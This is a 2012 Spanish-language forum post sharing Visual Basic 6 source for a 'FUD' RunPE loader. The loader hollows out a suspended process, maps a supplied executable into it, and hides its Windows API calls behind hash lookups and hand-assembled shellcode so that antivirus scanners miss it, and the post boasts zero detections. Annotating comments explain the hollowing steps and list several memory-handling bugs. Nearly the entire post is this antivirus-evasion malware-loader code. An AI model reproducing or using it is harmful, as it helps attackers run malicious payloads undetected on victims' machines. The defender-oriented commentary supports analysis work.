RunPe + HashInvoke FUD
Publicado: 03 Jun 2012, 15:08
Buenas tíos, nada raro: solo he cambiado los parámetros a hash.
Espero que os guste, saludos.
' ===========================================================================================================================
' ===========================================================================================================================
' => Autor: M3
' => RunPe + HashInvoke FUD basado en el JunPE de Jhonjhon_123
' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
' => Detecciones : 0 | 37 (http://scanner.udtools.net/reporte.php?id=vmnm_dyBj) -- resultado de un escaneo de 2012; el enlace puede estar caído y la cifra no refleja la detección actual de la técnica (process hollowing)
' => Fecha : 03|06|2012
' => sHost : Ruta al exe
' => sBytes: Bytes a ejecutar
' ===========================================================================================================================
' ===========================================================================================================================
' Used as a trampoline: the bytes at lpCode are executed as a stdcall function
' and the four Optional Longs are forwarded as its arguments (hWnd, Msg, wParam,
' lParam). Every hand-assembled stub in this module is run through this call.
Declare Function CallWindowProcA Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
' Set to 248 inside sInject and used as the byte distance from e_lfanew to the
' first section header, i.e. it hard-codes sizeof(IMAGE_NT_HEADERS32) and never
' reads FileHeader.SizeOfOptionalHeader.
Private sVALUE As Byte
' Receives the 37-byte memcpy stub that MoveMemory executes (filled by sInject).
Private sMEMORY(40) As Byte
' Declared but never referenced: sHashInv builds both stubs in local arrays.
Private ASM_GETAPIPTR(170) As Byte
Private ASM_CALLCODE(255) As Byte
' Scratch copies of the payload's PE headers.
' NOTE(review): these hold 66, 257 and 61 bytes, but sInject copies 72, 256 and
' 64 bytes into them, so the DOS-header and section-header copies write past
' the end of their arrays into adjacent module data.
Private IMAGE_DOS_HEADER(65) As Byte
Private IMAGE_NT_HEADERS(256) As Byte
Private IMAGE_SECTION_HEADER(60) As Byte
' PROCESS_INFORMATION out-buffer; sInject reads hProcess at offset 0 and
' hThread at offset 4.
Private PROCESS_INFORMATION(44) As Byte
' Thread CONTEXT buffer, 211 bytes. NOTE(review): an x86 CONTEXT is &H2CC (716)
' bytes, so if the two hashed NTDLL calls that take (hThread, &tCONTEXT) are the
' get/set-context routines their argument layout suggests, they read and write
' far beyond this array. Only ContextFlags (offset 0) and Eax (offset 176) are
' touched explicitly.
Private tCONTEXT(210) As Byte
' STARTUPINFO as 17 Longs (68 bytes), left all-zero: the copy meant to set cb
' asks for 0 bytes.
Private STARTUPINFO(16) As Long
' Fields parsed from the payload in sBytes (offsets are those of PE32 headers):
Private sParams As Long          ' e_lfanew; shadowed by the ParamArray of the same name inside sHashInv
Private sImageBase As Long       ' OptionalHeader.ImageBase (NT offset 52)
Private sProcess As Long         ' PROCESS_INFORMATION.hProcess
Private sThread As Long          ' PROCESS_INFORMATION.hThread
Private SizeOfImage As Long      ' OptionalHeader.SizeOfImage (NT offset 80)
Private SizeOfHeaders As Long    ' OptionalHeader.SizeOfHeaders (NT offset 84)
Private sEntryPoint As Long      ' OptionalHeader.AddressOfEntryPoint (NT offset 40), an RVA
Private sVirtualAddress As Long  ' current section's VirtualAddress (section offset 12)
Private sRawData As Long         ' current section's PointerToRawData (offset 20) -- name does not match the PE field
Private sRawDataPoint As Long    ' current section's SizeOfRawData (offset 16) -- likewise
' NOTE(review): never assigned anywhere in this file, so it is always 0 where
' sInject uses it as the base of a remote write address.
Private sEbx As Long
' Loop counters; Y indexes sMEMORY and is never reset between calls.
Private D As Long
Private Y As Long
Private vItem As Variant
' FileHeader.NumberOfSections (NT offset 6).
Private sSection As Integer
' Two 4-byte views of one value; sLong overlays DWORD_L onto DWORD_B with LSet
' to split a Long into its little-endian bytes.
Private Type DWORD_L
D1 As Long
End Type
Private Type DWORD_B
B1 As Byte
B2 As Byte
B3 As Byte
B4 As Byte
End Type
' Process-hollowing loader ("RunPE"): starts sHost suspended, replaces its
' mapped image with the PE32 held in sBytes and resumes it at the payload's
' entry point. Every OS call goes through sHashInv, so the API names mentioned
' below are inferred from argument layouts; the hash values themselves are not
' resolved in this file. From a defender's view the observable sequence is the
' classic hollowing chain: create-suspended -> unmap at the payload's ImageBase
' -> allocate RWX there -> write headers and sections -> get/set thread context
' -> resume.
'   sHost  - path of the executable to start and hollow out
'   sBytes - raw bytes of the PE32 image to run in its place (trusted as-is:
'            no bounds or sanity checks on any header field)
' Returns Empty (no declared type). No return value of any call is checked,
' so every failure is silent.
' NOTE(review): not re-entrant. The module-level index Y is never reset, so a
' second call writes sMEMORY past its upper bound.
' Byte counts written as &H1 + &H3 + &H2 etc. are just obfuscated constants
' (6, 8, 4); several of them copy more bytes than the destination Long holds.
Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
' Load the memcpy stub used by MoveMemory into sMEMORY. The 37 bytes decode to:
' save regs; esi = 2nd arg (source), edi = 1st arg (dest), ecx = 3rd arg (count);
' rep movsd / rep movsb; restore; ret 10h (the four CallWindowProcA args).
' sVALUE is assigned 248 on every iteration; only the final value is used.
For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, _
&H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, _
&HC2, &H10, &H0, &H10)
sMEMORY(Y) = vItem
Y = Y + 1
sVALUE = 200 + 48
Next
' Copies 0 bytes: STARTUPINFO.cb is left at 0 (presumably 72 was intended).
Call MoveMemory(Varptr(STARTUPINFO(0)), Varptr(72), CLng("0"))
' ContextFlags = &H10007 (CONTEXT_FULL). 8 bytes are copied from a 4-byte Long
' temporary, so tCONTEXT(4..7) receive whatever follows it.
Call MoveMemory(Varptr(tCONTEXT(CLng("0"))), Varptr(&H10007), &H1 + &H4 + &H3)
' DOS header: 72 bytes into a 66-byte array; then e_lfanew (offset 60) as a
' 6-byte copy into the 4-byte sParams.
Call MoveMemory(Varptr(IMAGE_DOS_HEADER(CLng("0"))), Varptr(sBytes(CLng("0"))), 72)
Call MoveMemory(Varptr(sParams), Varptr(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
' NT headers and the optional-header fields needed for the copy. No check that
' sParams + 256 lies inside sBytes.
Call MoveMemory(Varptr(IMAGE_NT_HEADERS(CLng("0"))), Varptr(sBytes(sParams)), 256)
Call MoveMemory(Varptr(sImageBase), Varptr(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
Call MoveMemory(Varptr(SizeOfImage), Varptr(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
Call MoveMemory(Varptr(SizeOfHeaders), Varptr(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
Call MoveMemory(Varptr(sEntryPoint), Varptr(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
Call MoveMemory(Varptr(sSection), Varptr(IMAGE_NT_HEADERS(6)), &H2)
' Argument layout matches CreateProcessW(NULL, sHost, NULL, NULL, TRUE,
' CREATE_SUSPENDED = &H4, NULL, NULL, &si, &pi). Handles are inherited
' (bInheritHandles = 1). Success is not checked.
Call sHashInv("KERNEL32", &H16B3FE88, 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, Varptr(STARTUPINFO(CLng("0"))), Varptr(PROCESS_INFORMATION(CLng("0"))))
Call MoveMemory(Varptr(sProcess), Varptr(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
Call MoveMemory(Varptr(sThread), Varptr(PROCESS_INFORMATION(4)), &H1 + &H3)
' (hProcess, ImageBase): NtUnmapViewOfSection pattern -- unmaps whatever the
' host has at the payload's preferred base.
Call sHashInv("NTDLL", &HF21037D0, sProcess, sImageBase)
' (hProcess, ImageBase, SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE):
' VirtualAllocEx pattern. The returned address is discarded, so the code assumes
' the region was granted exactly at ImageBase (no relocation handling).
Call sHashInv("KERNEL32", &H6E1A959C, sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
' (hProcess, Base, Buffer, Size, BytesWritten = NULL): NtWriteVirtualMemory
' pattern; writes the payload's headers.
Call sHashInv("NTDLL", &HC5108CC2, sProcess, sImageBase, Varptr(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
' Map each section: header D lives at e_lfanew + 248 + 40*D (sVALUE hard-codes
' the PE32 header size). 64 bytes are copied into the 61-byte array although a
' section header is 40 bytes. Offsets 12/16/20 are VirtualAddress /
' SizeOfRawData / PointerToRawData; the 8-byte copy at 16 spills into the
' next Long. sBytes(PointerToRawData) is never bounds-checked.
For D = 0 To sSection - 1
Call MoveMemory(Varptr(IMAGE_SECTION_HEADER(CLng("0"))), Varptr(sBytes(sParams + sVALUE + 40 * D)), &H40)
Call MoveMemory(Varptr(sVirtualAddress), Varptr(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
Call MoveMemory(Varptr(sRawDataPoint), Varptr(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
Call MoveMemory(Varptr(sRawData), Varptr(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
Call sHashInv("NTDLL", &HC5108CC2, sProcess, sImageBase + sVirtualAddress, Varptr(sBytes(sRawData)), sRawDataPoint, CLng("0"))
Next
' (hThread, &tCONTEXT): get-thread-context pattern into a 211-byte buffer
' (a full x86 CONTEXT is 716 bytes -- see the declaration).
Call sHashInv("NTDLL", &HE935E393, sThread, Varptr(tCONTEXT(CLng("0"))))
' Writes 6 bytes of sVirtualAddress (the last section's RVA) to remote address
' sEbx + 8. sEbx is never assigned in this file, so the target is address 8 and
' the write presumably fails; it looks like a leftover of the PEB image-base
' patch other RunPE variants perform here, which this version therefore skips.
Call sHashInv("NTDLL", &HC5108CC2, sProcess, sEbx + &H4 + &H1 + &H3, Varptr(sVirtualAddress), &H1 + &H3 + &H2, CLng("0"))
' CONTEXT.Eax (offset &HB0 = 176) = ImageBase + AddressOfEntryPoint; on x86 the
' suspended primary thread picks up its start address from Eax. The read-back
' into sEntryPoint on the next line has no further effect.
Call MoveMemory(Varptr(tCONTEXT(176)), Varptr(sImageBase + sEntryPoint), &H1 + &H3)
Call MoveMemory(Varptr(sEntryPoint), Varptr(tCONTEXT(176)), &H1 + &H3)
' (hThread, &tCONTEXT): set-thread-context pattern, then
' (hThread, NULL): NtResumeThread pattern -- the payload starts running.
Call sHashInv("NTDLL", &H6935E395, sThread, Varptr(tCONTEXT(CLng("0"))))
Call sHashInv("NTDLL", &HC54A46C8, sThread, CLng("0"))
End Function
Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
    ' memcpy replacement without a declared RtlMoveMemory import: runs the
    ' hand-assembled copy stub in sMEMORY through sHashInv. The hashed USER32
    ' routine is invoked with the CallWindowProcA argument layout
    ' (stub, hWnd = lpDest, Msg = lpSource, wParam = cBytes, lParam = 0), so the
    ' stub sees (dest, source, count). The return value is discarded.
    ' Only meaningful once sInject has filled sMEMORY; before that the array is
    ' all zeroes and is not the copy routine.
    Dim lpStub As Long
    lpStub = Varptr(sMEMORY(0))
    sHashInv "USER32", &HC8358393, lpStub, lpDest, lpSource, cBytes, 0&
End Sub
' Resolves an export by name hash and calls it: sHashInv(dll, hash, args...).
' Two stubs are assembled into local Byte arrays and executed via
' CallWindowProcA, i.e. code runs out of data memory; with DEP enforced for the
' process this faults (32-bit VB6 executables are typically not /NXCOMPAT).
'   sAsmPtr  - resolver. Walks PEB->Ldr->InInitializationOrderModuleList for a
'              module whose BaseDllName is 12 WCHARs and starts with 'k'/'K'
'              (kernel32.dll), looks up hash &HEC0E4EA4 in its export table --
'              this value is the hash of "LoadLibraryW" under the routine
'              below, consistent with StrPtr(sDll) being a UTF-16 pointer --
'              calls it with sDll, then looks up sHashCode in the returned
'              module. Hash: h = ror(h,13) + c over each byte of the export
'              name, NUL excluded. If no name matches, eax is 0 on return.
'   sAsmCode - trampoline: one "push imm32" (&H68) per argument, emitted
'              last-to-first so the callee sees stdcall order, then
'              "mov eax, <addr>" (&HB8), "call eax" (&HFF &HD0), "ret" (&HC3).
'   sDll      - name of the module to load (VB String; UTF-16 buffer is passed)
'   sHashCode - hash of the export to invoke
'   sParams   - its arguments; each is turned into a Long by sLong
' Returns the callee's eax. There is no failure path: an unresolved export
' leaves eax = 0 and the trampoline then calls address 0.
' NOTE(review): Byte elements are assigned string literals such as "&H68";
' VB6's implicit string-to-number coercion honours the &H prefix, so these are
' obfuscated byte constants, nothing more. The resolver stub is executed four
' times with identical arguments (once per address byte) where one call and
' one sLong would do.
Function sHashInv(ByVal sDll As String, ByVal sHashCode As Long, ParamArray sParams() As Variant) As Long
Dim vItem As Variant
Dim i As Long
Dim W As Long
Dim sAsmPtr(0 To 170) As Byte
Dim sAsmCode(0 To 255) As Byte
' Resolver bytes: entry (call find-kernel32; resolve LoadLibraryW; call it on
' [esp+4]; resolve [esp+8] in the result; ret), the module finder, and the
' export-table hash scan (NumberOfNames at +&H18, AddressOfNames at +&H20,
' AddressOfNameOrdinals at +&H24, AddressOfFunctions at +&H1C).
For Each vItem In Array _
_
_
(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, _
&HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, _
&HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, _
&H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, _
&H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, &H53, &H56, &H57, &H8B, &H6C, _
&H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, _
&H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, _
&H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, _
&HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, _
&HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, _
&H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
sAsmPtr(i) = vItem: i = i + 1
Next vItem: i = 0
' Emit "push imm32" for each argument, right-to-left. Non-Long Variants are
' coerced by sLong's ByVal Long parameter.
For W = UBound(sParams) To LBound(sParams) Step -1
sAsmCode(i) = "&H" & "68"
i = i + 1
sAsmCode(i) = sLong(sParams(W)).B1
i = i + 1
sAsmCode(i) = sLong(sParams(W)).B2
i = i + 1
sAsmCode(i) = sLong(sParams(W)).B3
i = i + 1
sAsmCode(i) = sLong(sParams(W)).B4
i = i + 1
Next W
' "mov eax, imm32" with the resolved export address; the resolver stub is run
' once per byte of that address.
sAsmCode(i) = "&H" & "B8"
i = i + 1
sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B1
i = i + 1: _
sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B2
i = i + 1: _
sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B3
i = i + 1: _
sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B4
' "call eax" then "ret"; the stdcall callee removes the pushed arguments.
i = i + 1: _
sAsmCode(i) = "&H" & "FF": i = i + 1: sAsmCode(i) = "&H" & "D0"
i = i + 1: _
sAsmCode(i) = "&H" & "C3"
' Run the trampoline; its eax (the callee's return value) is our result.
i = i + 1: _
sHashInv = CallWindowProcA(Varptr(sAsmCode(0)))
End Function
Private Function sLong(ByVal lLong As Long) As DWORD_B
    ' Splits a 32-bit Long into its four little-endian bytes (B1 = least
    ' significant). sHashInv uses it to emit immediates into its call stub.
    ' Arithmetic equivalent of the LSet overlay: each byte is masked out and
    ' shifted down with integer division. Every masked value is an exact
    ' multiple of its divisor, so the sign of lLong cannot affect the quotient.
    Dim tBytes As DWORD_B
    tBytes.B1 = lLong And &HFF&
    tBytes.B2 = (lLong And &HFF00&) \ &H100&
    tBytes.B3 = (lLong And &HFF0000) \ &H10000
    tBytes.B4 = ((lLong And &HFF000000) \ &H1000000) And &HFF&
    sLong = tBytes
End Function